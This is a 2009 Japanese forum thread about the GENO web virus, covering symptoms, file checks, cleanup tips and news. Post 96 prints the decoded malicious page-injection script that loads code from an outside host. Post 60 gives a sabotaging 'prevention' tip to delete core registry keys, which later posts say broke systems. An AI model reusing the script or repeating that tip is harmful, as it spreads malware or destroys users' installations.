GENOウイルススレ ★ ..
2:名無しさん@お腹いっぱい。
09/05/26 23:06:53
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
URLリンク(www.btfree.info)
Code by: 790e3cc3feabad9
3:名無しさん@お腹いっぱい。
09/05/26 23:07:37
Bsqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
※従来のテンプレのcmd.exeによる確認は危険
★感染した場合
現状ではクリーンインストールするしかない
4:名無しさん@お腹いっぱい。
09/05/26 23:08:20
うったえてやう
5:名無しさん@お腹いっぱい。
09/05/26 23:08:20
糞テンプレ修正完了
6:名無しさん@お腹いっぱい。
09/05/26 23:43:21
> ■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
これも間違いじゃなかったっけ? 9.1.1で修正された脆弱性はGENOウイルスとは無関係
> ■ adobe flashplayerを最新版に更新
> URLリンク(fpdownload.macromedia.com)
だからこれじゃIEのFlash Playerが更新されないってば
7:名無しさん@お腹いっぱい。
09/05/27 00:02:38
>>1
GENOウイルスチェッカー(アフィリエイトも充実)
URLリンク(geno.2ch.tc)← アフィリエイト(Amazon) ↓ソース
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに URLリンク(geno.2ch.tc)
でjaneから検索でチェックできる
8:名無しさん@お腹いっぱい。
09/05/27 02:21:46
-----------------------------
ActiveX (アクティブエックス)
JavaScript (ジャバスクリプト)
-----------------------------
どんな脆弱性があってもルーター(FW)と
この2つをOFF(無効)にすれば無敵になれる
9:名無しさん@お腹いっぱい。
09/05/27 02:25:24
メールは
クロネコメールをつかえ
10:名無しさん@お腹いっぱい。
09/05/27 02:26:47
ソフトはフリーソフトは使わず市販のソフトのみつかえ
11:名無しさん@お腹いっぱい。
09/05/27 02:47:57
>>8
"無敵"ではない
自分が知ってる限りでも
・HTML解釈ミスによるクラッシュ(IE)
・HTML解釈ミスによる任意コードの実行(IE)←うろ覚えだが存在した筈
・IIS稼働環境+IFRAME←推測だが、IISのURIバグで進入され得る可能性がある
・JPEG解釈ミスによるクラッシュ・任意コードの実行(2ch専用ブラウザ、IE、DLファイル経由他)←一時有名になったGDIのバグ
確かGIFでも起きたはず
副作用なしのクラッシュくらいは余裕で起きるし、静的コンテンツの任意コード実行の脆弱性が残ってればいくらでも進入の危険はある
12:名無しさん@お腹いっぱい。
09/05/27 05:48:27
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
起動しない
Asqlsodbc.chmのファイルサイズの確認を確認する
4.00 KB (4,096 バイト
見事に感染しています。
クリーンインストールしたいのですが、質問があります。
データをUSBに移そうとおもうのですが、移すファイルにGENOが入ってないか確かめたい
のですが、どうすればよいでしょうか?
13:名無しさん@お腹いっぱい。
09/05/27 09:02:01
家族PCが感染してました
1.起動してもexplorerが起動しない(ユーザは一見何も出来ない)
2.CTRL+ALT+DELでタスクマネージャー立ち上げて新しいタスク実行
3.CMD起動
4.regedit.exe > 起動しない
regedit.exe互換ソフトなんてありましたっけ?
14:名無しさん@お腹いっぱい。
09/05/27 09:05:22
↑窓の杜にあっさりありました
失礼しました
まとめサイトみてもクリーンインストールばかりだったので
(そのほうが安全だけどね)
対処療法例のひとつとして..
15:名無しさん@お腹いっぱい。
09/05/27 10:29:27
>>14
対処療法にもなってないけどねw
16:名無しさん@お腹いっぱい。
09/05/27 10:49:35
>>14
除去してねーしwww被害広げる前に、クリーンインストールしとけよ。
17:名無しさん@お腹いっぱい。
09/05/27 11:02:47
中古パソコンとパソコンパーツの通販ショップGENO
www.geno-web.jp/
↑
2chのコピペブログを徘徊してたらGENOのサイトが勝手に立ち上がってた
GENOリンクをクリックした覚えは無く沢山タブ開いてたからどこの何が原因か分かりません
こちらのPCに感染らしき症状は見られずここ一週間で2回発生
こんなことってあります?
18:名無しさん@お腹いっぱい。
09/05/27 11:12:20
それマジで早急に精神科で見てもらった方がいいぞ
19:名無しさん@お腹いっぱい。
09/05/27 11:25:07
>>17
勝手に広告のウィンドウが開くのと同じ仕組みを利用して
感染させようとしている奴がいるのでしょ。
20:名無しさん@お腹いっぱい。
09/05/27 11:56:14
クリックしたのを忘れてるんだろ
21:名無しさん@お腹いっぱい。
09/05/27 11:56:51
疑わしい症状を発症したけれど…
勝手にAcrobatReaderが立ち上がってる。
メモリバカ食い。
CPU使用率90%
トレンド、マカフィー、シマンテックのHPが見れない。
最新定義でウィルススキャン→検知せず。
システムの復元で発症一か月前に復元。
再度ウィルススキャン→検知せず。
症状が回復する。
GENOに感染したと思うんだ!だが、システムの復元で回復してるんだ!
事後だけど感染の確認方法をしてみたら異常はないんだけれど、
念の為、PCをクリーンインストールした方がいいだろうか。。。
22:名無しさん@お腹いっぱい。
09/05/27 12:04:49
力説するくらいならそのままで良いんじゃないの
多分大丈夫って意見が欲しい書き込みにしか見えないし
23:名無しさん@お腹いっぱい。
09/05/27 12:08:18
>>21
前スレの最後の方読んだ?
システムの復元だけじゃsqlsodbc.chmのサイズが
感染前に戻らない(=ウイルス消えない)
経験談が出てるよ
念の為でなく、真面目に駆除したかったら
クリーンインスコしましょう
24:名無しさん@お腹いっぱい。
09/05/27 12:11:38
それか、この際とことん実験する気あるなら
ホストファイルのlocalhost以外のip
全削除した状態で最新パターンファイルに更新した後
ウイルスチェックして削除できるか見てみてよ
報告よろしこ
25:名無しさん@お腹いっぱい。
09/05/27 12:14:36
何がなんだかわからんやつは前消し
26:名無しさん@お腹いっぱい。
09/05/27 12:16:06
訂正
× localhost以外
○ localhost以下の行(localhostの行は残す)
27:21です。
09/05/27 12:25:22
今、前スレ読んできた…。
クリーンインストールしてみるよ。
ありがとん。
28:名無しさん@お腹いっぱい。
09/05/27 12:57:32
結局この騒動はなんだったんだろう
29:名無しさん@お腹いっぱい。
09/05/27 13:37:45
キャッシュを消しただけではどうにもならないということを学びました
30:名無しさん@お腹いっぱい。
09/05/27 13:52:41
>>1
おい!!せっかくテンプレ修正してたのに!!
★5月27日現在、沈静化しています。
★GENOウイルスチェッカー、GENOウイルスまとめ
URLリンク(geno.2ch.tc)
★対処法(GENOウイルスチェッカーのサイトから引用)
■ adobe readerを9.1.1にアップデートする(9.1:9.1.0では駄目)
(9.1.0)
URLリンク(ardownload.adobe.com)
(9.1.1↑,をインストールしてから↓を適用)
URLリンク(ardownload.adobe.com)
バージョン情報はadobe readerを起動してヘルプ→adobe reader ?についてで表示されます
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ adobe flashplayerを最新版に更新
URLリンク(fpdownload.macromedia.com)
■ Operaでプラグイン、Javaをオフ(JavaScript単体では全く安全です。)
1.[F12]を押す→[プラグインを有効にする]のチェックを外す)
2.[F12]を押す→[javaを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなりますが、難しいです。
この方法だと便利なJavaScriptを犠牲にせず、簡単に安全なブラウジングが実現できます
さらに、QuickTimeなどの未知の脆弱性にも対処できます)
■ Vistaの人ははUACをONにする
31:名無しさん@お腹いっぱい。
09/05/27 13:57:02
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
★Anubisレポート
URLリンク(anubis.iseclab.org)
★感染確認方法
@regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとレジストリエディタが立ち上がらない。
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
Asqlsodbc.chmのファイルサイズの確認を確認する
Windows XP,Windows 2000にて、
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
※従来のテンプレのcmd.exeによる確認は危険
※従来のテンプレによるとWindows 2000ではsqlsodbc.chmが無いことになってるが
.NET framework等にくっついてインスコされる
32:名無しさん@お腹いっぱい。
09/05/27 13:58:38
★GENOウイルス感染からの復帰方法
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chm(URLリンク(www1.axfc.net))に差し替え
33:名無しさん@お腹いっぱい。
09/05/27 14:28:21
>>30
>>7
アフィチェッカー
34:名無しさん@お腹いっぱい。
09/05/27 14:33:37
しつこい
35:名無しさん@お腹いっぱい。
09/05/27 14:54:46
久々にきたら21になってて腰抜かした
36:名無しさん@お腹いっぱい。
09/05/27 14:56:39
よく考えたら10分前にもきてた
37:名無しさん@お腹いっぱい。
09/05/27 15:01:55
友達にどのプロバイダー使ってるか聞いたらさ、「教えぬ!」って言うわけよ。
ちょっとカチンと来たけど我慢してもう一度聞いたら、「だから教えぬ!」だってさ。
あんなに頑固な奴だとは思わなかったぜ
38:名無しさん@お腹いっぱい。
09/05/27 15:25:30
ocn
39:名無しさん@お腹いっぱい。
09/05/27 16:41:23
plala
40:名無しさん@お腹いっぱい。
09/05/27 16:46:03
eooooooooooooooooooooooo
41:名無しさん@お腹いっぱい。
09/05/27 16:46:58
■FireFox のリンク先読み機能を無効にする
about:config
network.prefetch-next → false
42:名無しさん@お腹いっぱい。
09/05/27 16:49:43
テンプレみて感じた事
>>1
火狐厨乙
>>7
アフィ厨乙
>>30
Opera厨乙
43:名無しさん@お腹いっぱい。
09/05/27 16:52:54
>>7
アフィチェッカーうぜぇ
GENOと共に死ね
ちなみにAmazonのアフィ
geno2chtc-22
geno2chtc
44:名無しさん@お腹いっぱい。
09/05/27 16:55:27
推奨NGワード 「アフィ」 「チェッカー」 「厨」
45:名無しさん@お腹いっぱい。
09/05/27 17:02:36
>>44
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::。:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::。::::::...... ... --─- :::::::::::::::::::: ..::::: . ..::::::::
:::::::::::::::::...... ....:::::::゜::::::::::.. (___ )(___ ) ::::。::::::::::::::::: ゜.::::::::::::
:. .:::::。:::........ . .::::::::::::::::: _ i/ = =ヽi :::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡:::: //[|| 」 ||] ::::::::::゜:::::::::: ...:: :::::
:::::::::::::::::: . . . ..: :::: / ヘ | | ____,ヽ | | :::::::::::.... .... .. .::::::::::::::
::::::...゜ . .::::::::: /ヽ ノ ヽ__/ ....... . .::::::::::::........ ..::::
:.... .... .. . く / 三三三∠⌒>:.... .... .. .:.... .... ..
:.... .... ..:.... .... ..... .... .. .:.... .... .. ..... .... .. ..... ............. .. . ........ ......
:.... . ∧∧ ∧∧ ∧∧ ∧∧ .... .... .. .:.... .... ..... .... .. .
... ..:( )ゝ ( )ゝ( )ゝ( )ゝ無茶しやがって… ..........
.... i⌒ / i⌒ / i⌒ / i⌒ / .. ..... ................... .. . ...
.. 三 | 三 | 三 | 三 | ... ............. ........... . .....
... ∪ ∪ ∪ ∪ ∪ ∪ ∪ ∪ ............. ............. .. ........ ...
三三 三三 三三 三三
三三 三三 三三 三三
46:名無しさん@お腹いっぱい。
09/05/27 17:04:00
ググるのは危ないって本当ですか?
一応ヤフーで検索してるけど不便で
47:名無しさん@お腹いっぱい。
09/05/27 17:04:05
チェッカーをNG入りさせるとソースチェッカーとかのレスも消えるからやだ
48:名無しさん@お腹いっぱい。
09/05/27 17:04:17
ここまで感染無し
49:名無しさん@お腹いっぱい。
09/05/27 17:05:22
>>46
マジウソ
50:名無しさん@お腹いっぱい。
09/05/27 17:05:26
気づいていないだけだったりして
51:名無しさん@お腹いっぱい。
09/05/27 17:06:06
ググる先生が気になるなら念のため、先読み無効にしておけば問題なし
52:名無しさん@お腹いっぱい。
09/05/27 17:17:50
sqlsodbc.chmのファイルサイズ確認って、
このファイル名で検索して出てきたサイズ見るだけじゃダメなの?
53:名無しさん@お腹いっぱい。
09/05/27 17:19:34
>>49>>51
>>41の対策しました、ありがとうございます
54:名無しさん@お腹いっぱい。
09/05/27 17:22:00
検索でやってみた。
sqlsodbc.chm
サイズ 49.5 KB (50,727 バイト)
ディスク上のサイズ 52.0 KB (53,248 バイト)
55:名無しさん@お腹いっぱい。
09/05/27 17:31:55
つまり検索では確認手段として十分とは言えないって事なのか
56:名無しさん@お腹いっぱい。
09/05/27 17:32:34
どうして「従来のテンプレのcmd.exeによる確認は危険」なんですか?
もう何度かやったんですけど…
57:名無しさん@お腹いっぱい。
09/05/27 17:36:40
sqlsodbc.ch_
BASHO=I386
COPY
SYSTEM32
RENAME
sqlsodbc.chm
RESTART
58:名無しさん@お腹いっぱい。
09/05/27 18:12:27
「姿を変えて検出回避」「攻撃サイトは閉鎖」、最新Webウイルスの詳細
シマンテックが緊急説明会、「別の攻撃サイトが出現する恐れあり」
URLリンク(itpro.nikkeibp.co.jp)
特に目新しい情報はなさそうだけど貼っとく
59:名無しさん@お腹いっぱい。
09/05/27 18:20:39
アフィリンク復活させやがった
shine
60:名無しさん@お腹いっぱい。
09/05/27 18:23:22
予防策
レジストリエディタを開いて、以下のキーを全て削除して、再起動
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
上記のキーはウィルス・スパイウェアを活動させます
61:名無しさん@お腹いっぱい。
09/05/27 18:23:45
せっかくテンプレから外してたのに
62:名無しさん@お腹いっぱい。
09/05/27 18:23:59
コピペでクレジットの情報とかも抜かれるって読んだんだけど本当?
インターネットウォッチとかの記事読む限りFTP関係しか書いてないんだが
63:名無しさん@お腹いっぱい。
09/05/27 18:24:44
しらん
64:名無しさん@お腹いっぱい。
09/05/27 18:24:45
>>54
俺もサイズ 49.5 KB (50,727 バイト)だったけど大丈夫ってことだよな?
65:名無しさん@お腹いっぱい。
09/05/27 18:29:17
>>64 調べたが問題ないみたいだ たぶんww
66:名無しさん@お腹いっぱい。
09/05/27 18:31:39
>>64
今後の予防に
>>60を実行してください
67:名無しさん@お腹いっぱい。
09/05/27 18:34:48
>>54
容量的には正常
更に気になるならハッシュ値の確認をどうぞ
68:名無しさん@お腹いっぱい。
09/05/27 18:36:13
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
69:名無しさん@お腹いっぱい。
09/05/27 18:36:48
もういいや
後はAVGちゃんが何とかしてくれるに決まってるもん
70:名無しさん@お腹いっぱい。
09/05/27 19:12:36
すまん教えてくれ。
そもそもGENOのサイトが改竄されたのは、ハッキングなの?
71:名無しさん@お腹いっぱい。
09/05/27 19:17:45
サイトの管理者がネットでいかがわしい所に行ったPCで踏んできたんじゃない?
72:名無しさん@お腹いっぱい。
09/05/27 19:18:31
じゃなくて 踏んできたPCでサイト更新したからじゃない?
73:名無しさん@お腹いっぱい。
09/05/27 19:23:40
踏んできたPCで更新かけても、
ファイル転送がSFTPだったら暗号とけなくて
ウイルス涙目?
74:名無しさん@お腹いっぱい。
09/05/27 19:50:30
>>56
GENOじゃない他のウイルスでそれ起動させると悪化するやつがあるとかってどっかのスレで見た
自分もよく知らないけど健康なPCなら起動させても問題ないんじゃないの
75:名無しさん@お腹いっぱい。
09/05/27 20:03:02
Returnilを使ってればGENOを踏んで感染しても、
OSを再起動した時点で「感染しなかった事になる」
再起動後、パスワードを変更するだけでおk。
【仮想化】Returnil Virtual System【仮想化】
スレリンク(sec板)
76:名無しさん@お腹いっぱい。
09/05/27 20:06:14
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
両方とも起動
Asqlsodbc.chmのファイルサイズの確認を確認する
↑いまこれを確認してるのですが、
cmd.exeの真っ黒い画面に「dir C:\WINDOWS\system32\sqlsodbc.chm」と打ち込んでも
ファイルが見つかりませんと出ます。
Vistaだからでしょうか?
77:名無しさん@お腹いっぱい。
09/05/27 20:12:25
>>70
現時点でGENOからの説明は一切ないっぽい。
もし犯人がショッピングサイトだと知っていてハック&改竄したのだとしたら、
それこそクレカ情報とか心配だな。
78:名無しさん@お腹いっぱい。
09/05/27 20:22:48
GENOウイルス騒動で再考するマルウェア対策 - ITmedia エンタープライズ
URLリンク(www.itmedia.co.jp)
感染活動による攻撃者の狙いは、
ユーザーを詐欺サイトへ誘導する目的で検索エンジンの結果を書き換えたり、
不正広告を配信したりすることや、詐欺的ソフトのインストール、
個人情報の盗難、バックドアのインストールなどがあるとみられる。
いずれの場合でも、金銭やボットマシンの確保といったサイバー犯罪の流行に沿ったものである可能性が高い。
シマンテックセキュリティレスポンスの林薫主任研究員は、
「こうした攻撃では自動化された攻撃ツールを使われるのが一般的だが、
今回は人海戦術によってち密な計画で仕掛けられた可能性がある」と推測する。
79:名無しさん@お腹いっぱい。
09/05/27 20:25:43
GENO伝説ここに始まる。一気に全国区へ。
80:名無しさん@お腹いっぱい。
09/05/27 20:37:32
>>56
その書き込みをどこで見たのかわからんがWikiに載ってるまま指摘ないんだし問題ないよな…?
というかかなりの数の人がcmd.exeで確認しただろうしそれが危険だとしたらやばいと思うが
81:名無しさん@お腹いっぱい。
09/05/27 20:37:48
本当にこのGENOウィルスは豚インフルの感染の広がりと同期してるんじゃないか
また冬に再流行とか止めてくれよ
82:名無しさん@お腹いっぱい。
09/05/27 20:56:02
Vista使えよ馬鹿?
83:56
09/05/27 20:56:52
>>74
>>80
そうですか。ありがとうございます。
今は大丈夫ですが、>>3と>>31に書いてあったので気になりました。
84:名無しさん@お腹いっぱい。
09/05/27 20:58:45
ウイルスじゃなくても情報が漏れることあります
【情報流出】楽天、利用者のメールアドレスを含む個人情報を「1件10円」でダウンロード販売していることが判明
スレリンク(newsplus板)
85:名無しさん@お腹いっぱい。
09/05/27 20:58:47
xp→windows7
vistaはスルー
86:名無しさん@お腹いっぱい。
09/05/27 20:59:44
>>1はなんでわざわざ古いテンプレを使うの?
アホなの?バカなの?死ぬの?
87:名無しさん@お腹いっぱい。
09/05/27 21:04:51
>>84
今更、何を
楽天では昔からのデフォ仕様(暗黙の了解、自己責任)
っていうか、ネットのショッピングモール自体がどこも似たような事をやってる
まー、通販ではカード決済は出来るだけ避けろってこった
88:名無しさん@お腹いっぱい。
09/05/27 21:10:03
「通常購入データ.csv」「オークションデータ.csv」「プレゼントデータ.csv」「共同購入データ.csv」「資料請求データ.csv」
「商品問合せデータ.csv」となっており、名字・名前・郵便番号・住所・電話番号・ニックネーム・
メールアドレス・クレジットカード番号・クレジットカード名義人・クレジットカード有効期限といった各種個人情報が記載されています。
ネット通販だけでこれだけ情報売られるのか‥
89:名無しさん@お腹いっぱい。
09/05/27 21:14:13
アマゾンもアウトかしら
タダで渡して売ってないから法的にはセーフ?
このタイミングでこの告発ってのは厚労省に睨まれた結果なんだろうけど
90:名無しさん@お腹いっぱい。
09/05/27 21:14:57
>>76
vistaは sqlsodbc.chm の場所が違います。
C:\Windows\Help\mui\0411\sqlsodbc.chm
気が済むまでチェックするよろし。
91:名無しさん@お腹いっぱい。
09/05/27 21:43:24
>>66
初心者はレジストリいじるなって言われたんですが大丈夫でしょうか
92:名無しさん@お腹いっぱい。
09/05/27 22:04:10
>>91
いじらない方がいいと思う
93:名無しさん@お腹いっぱい。
09/05/27 22:05:50
>>92
了解です、ありがとうございます
94:名無しさん@お腹いっぱい。
09/05/27 22:09:48
普段使ってるアカウントの方は壷使えなくなった上すごい重くてネットできない
だから別のアカウント使ってるんだけどタスクマネージャ見てたらプロセスがやけに少なくなってる
7つしかないよ。さっきはこれの4倍くらいあったのに
クリーンインストールしたいけどネットの設定を戻せる気がしない
95:名無しさん@お腹いっぱい。
09/05/27 22:27:00
>>85
勘違いする初心者が続出しそうな予感
96:名無しさん@お腹いっぱい。
09/05/27 22:34:59
a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0)
&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)
&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
97:名無しさん@お腹いっぱい。
09/05/27 22:37:04
>96はデコードしたスクリプト
NT6とChromeは特別扱いらしい
98:名無しさん@お腹いっぱい。
09/05/27 22:38:44
いまさらいきなりなに
99:名無しさん@お腹いっぱい。
09/05/27 22:53:09
16日にはデコードされていたスクリプト
見た瞬間分かるような情報
いったい何がしたかったのか
100:名無しさん@お腹いっぱい。
09/05/27 23:00:50
fc2、記事書いて全ユーザーにメールで注意したみたいだ
ついでにFTPの仕様も変えるみたい
URLリンク(blog.fc2.com)
URLリンク(blog.fc2.com)
101:名無しさん@お腹いっぱい。
09/05/27 23:01:09
>>89
アマゾンはほしいものリスト経由の個人情報流出事件が記憶に新しい
yahooも当然、前歴あり
ネット通販は、ある程度の流出は仕方ないくらいの認識じゃないとやっていけないよ
102:名無しさん@お腹いっぱい。
09/05/27 23:22:45
vistaでよかったわ
103:名無しさん@お腹いっぱい。
09/05/27 23:27:37
vistaでよかったと思える時が来るなんて思わんかった
104:名無しさん@お腹いっぱい。
09/05/27 23:34:41
なんだか可哀そうだぞw
105:名無しさん@お腹いっぱい。
09/05/27 23:39:02
>100
テンプレートが改竄されてた事には触れてないな
106:名無しさん@お腹いっぱい。
09/05/28 00:17:41
関係ないけど、いまだに改竄を一瞬「かいそ」と読んでしまう。
わかってるねん、わかってるねんで?
107:名無しさん@お腹いっぱい。
09/05/28 00:26:16
関係無いけど、きじゃくせいって「既知の脆弱性」の略だと思ってた
…どうした?
108:名無しさん@お腹いっぱい。
09/05/28 00:32:28
>しかもさまざまな亜種が存在、アンチウイルスソフトのアップデートでの完全対応は難しいのが現状です。しかし、不正侵入検知機能(IPS)を備えた統合セキュリティソフトでは、これらの被害を防げるのです。
断言しているけど大丈夫か?
URLリンク(shop.vector.co.jp)
109:名無しさん@お腹いっぱい。
09/05/28 00:39:12
>>108
なんだ知らなかったよ
JSをオフらなくてもソフトのIPSが防いでくれてたのか
一応ウイルスにかかった形跡もなかったから問題ないな
110:名無しさん@お腹いっぱい。
09/05/28 00:43:59
ところでavastとaviraもIPSって付いているのか?
111:名無しさん@お腹いっぱい。
09/05/28 00:50:53
>>100
FC2のブログとHPのサービス他4つ利用してるけどメール来ない…
112:名無しさん@お腹いっぱい。
09/05/28 00:53:44
>>110
ウイルスセキュリティゼロは付いていたっぽい
防御機能してたか知らんけど…
113:名無しさん@お腹いっぱい。
09/05/28 01:12:28
Vista+ UACにして適当な>>108を入れて
FIREFOX+NOSCRIPT+先読み無効
まめなうpデートで超おkなん?
でもショップGENOはどうやってウイルスにかかったんやろ?
アドベのアップもしなかったくらいだからノーガードやったかもな
114:名無しさん@お腹いっぱい。
09/05/28 01:22:19
>>113
しらねーよw
GENOはキャッシュ消せば治るとほざいてたくらいだから無防備仕様じゃろw
115:名無しさん@お腹いっぱい。
09/05/28 01:23:40
海外のeroticサイトでもみてたんだろか
116:名無しさん@お腹いっぱい。
09/05/28 01:24:04
>>111が何気にゲンキがない
病気やったんやろか
117:名無しさん@お腹いっぱい。
09/05/28 01:30:28
dフルエンザにかかっても2日以内に
タマゴ酒のめば直る
118:名無しさん@お腹いっぱい。
09/05/28 01:44:00
>>60やったらぶっ壊れた
119:名無しさん@お腹いっぱい。
09/05/28 02:18:45
書き込み出来てるじゃねぇか。
ちなみにscrファイルを書き換えさせてるわけではないので、regedit.exeをregedit.scrにリネームして復元するべし。
120:名無しさん@お腹いっぱい。
09/05/28 04:17:49
>>60
って誰でもあるの?削除して大丈夫なの?
121:名無しさん@お腹いっぱい。
09/05/28 04:48:48
誰でもある。
削除したらだめ。
122:名無しさん@お腹いっぱい。
09/05/28 05:48:23
楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
スレリンク(news板)
123:名無しさん@お腹いっぱい。
09/05/28 06:30:41
Genoウイルスの感染メカニズム【前編】(Scan) - Yahoo!ニュース
(5月27日18時38分配信)
URLリンク(headlines.yahoo.co.jp)
124:名無しさん@お腹いっぱい。
09/05/28 09:19:31
自動アップデートが無効になってオーディオデバイスが無しになってマイクロソフトとか特定のサイトにアクセスできなくなるんだけどこれって感染してる?
125:名無しさん@お腹いっぱい。
09/05/28 10:01:12
>>124
>>1
126:名無しさん@お腹いっぱい。
09/05/28 10:38:09
hosts
127:名無しさん@お腹いっぱい。
09/05/28 10:45:35
失礼
hostsファイル開いてみそ
127.0.0.1localhost
(127.0.0.1をローカルホストにする)
の記述の後に、
マイクロソフトやアンチウィルス系の
ドメインごちゃまんと追加されてるよ、きっと
128:名無しさん@お腹いっぱい。
09/05/28 11:05:33
ようつべの動画にリンク貼ったりしない方がいいのでしょうか
129:名無しさん@お腹いっぱい。
09/05/28 11:42:30
つべやにこにこは、ほぼ最新ver.のFlash Player
でないと見られないんじゃないかな
逆に言うと、見られる人はFlash Playerから
感染する可能性が少ない
投稿された動画自体が汚染されてる可能性は、
自分にはわからない
問題はacrobatよな
告知情報見るまで、acrobat readerにjs使えるなんて
知らなかったものw
130:名無しさん@お腹いっぱい。
09/05/28 11:57:23
>>129
ありがとうございました。
131:名無しさん@お腹いっぱい。
09/05/28 12:09:49
こう言う自己判断できない屑が動画サイト使うから動画サイト=キチガイと厨の巣、犯罪者予備軍の巣と言う感じ
132:名無しさん@お腹いっぱい。
09/05/28 12:25:35
日本は、いやアジアは、いや地球はキチガイと厨の巣、犯罪者予備軍の巣だな
133:名無しさん@お腹いっぱい。
09/05/28 12:28:56
>>132
あなたの祖国と日本を一緒にしないでいただきたい
134:名無しさん@お腹いっぱい。
09/05/28 12:37:26
>>60やったらregeditやcmdが起動しなくなりました
さらにexplorerも起動しなくなりデスクトップには壁紙だけしか表示されなくなりました
osはvistaです
ちなみにデスクトップの壁紙は外人ニューハーフの裸体(完全無修正)で
アイコンをぎっしり詰めて分からない様にカモフラージュしてました
135:名無しさん@お腹いっぱい。
09/05/28 12:41:17
12点
136:134
09/05/28 12:52:55
自己解決しました。
137:名無しさん@お腹いっぱい。
09/05/28 13:19:47
次スレいらないな。
138:名無しさん@お腹いっぱい。
09/05/28 13:28:03
GENO社員乙
